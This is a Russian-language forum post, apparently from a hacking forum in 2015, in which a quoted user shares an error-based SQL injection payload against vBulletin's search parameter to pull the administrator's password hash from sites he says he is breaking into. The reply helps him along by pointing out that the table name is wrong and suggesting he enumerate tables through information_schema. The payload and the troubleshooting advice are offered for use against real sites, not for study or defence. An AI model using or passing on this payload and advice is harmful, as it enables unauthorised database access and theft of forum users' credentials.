Показать сообщение отдельно

  #4  
Старый 08.12.2015, 17:09
t0ma5
Guest
Сообщений: n/a
Провел на форуме:
300820

Репутация: 90
По умолчанию

Цитата:
Сообщение от Sensoft  
Sensoft said:

В общем такой вопрос взламываю способом
Spoiler: Скрипт
securitytoken=guest&humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=p rocess&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
В ошибке должен выходить pass (без соли на это другой скрипт)
Но выходит такая годня почему ?

Даже если соль хочу вывести всё ровно такая хрень
и это не единственный сайт где такие траблы
vBulletin
так красным по белому же написано что таблицы user нет, information_schema рекомендую глянуть
 
Ответить с цитированием